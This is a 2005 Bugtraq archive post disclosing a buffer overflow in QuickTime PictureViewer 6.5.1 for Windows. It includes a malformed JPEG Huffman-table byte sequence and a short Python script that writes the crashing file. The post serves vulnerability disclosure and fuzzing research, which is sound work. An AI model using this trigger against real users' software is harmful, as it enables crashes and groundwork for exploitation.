Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

QuickTime malformed JPEG buffer overflow
From: <liquid () cyberspace org>
Date: 26 Mar 2005 23:08:48 -0000


When fuzzing some application with malformed input files, if we want to discover some vulnerability we have to create 
input file which is very close to valid file but yet malformed in some way. In that way chances for discovery are 
greater.
Now let's play with JPEG format. We concentrate on Huffman table segment. Marker for DHT is 0xffc4. 

Now, take valid JPEG file and replace first DHT with this malformed DHT:

0xffc4021100ffff000000000000+0x01*510

Open this modified file with QuickTime PictureViewer (version 6.5.1) for Windows and QuickTime will crash with Windows 
reporting access violation error. Next step would be creating exploit, but I leave that to people with more skill in 
doing that.

Here is quick and dirty script in Python for creating such malformed file:

import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()

For details about JPEG format take a look at:

http://www.w3.org/Graphics/JPEG/itu-t81.pdf

  By Date           By Thread  

Current thread:
  • QuickTime malformed JPEG buffer overflow liquid (Mar 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]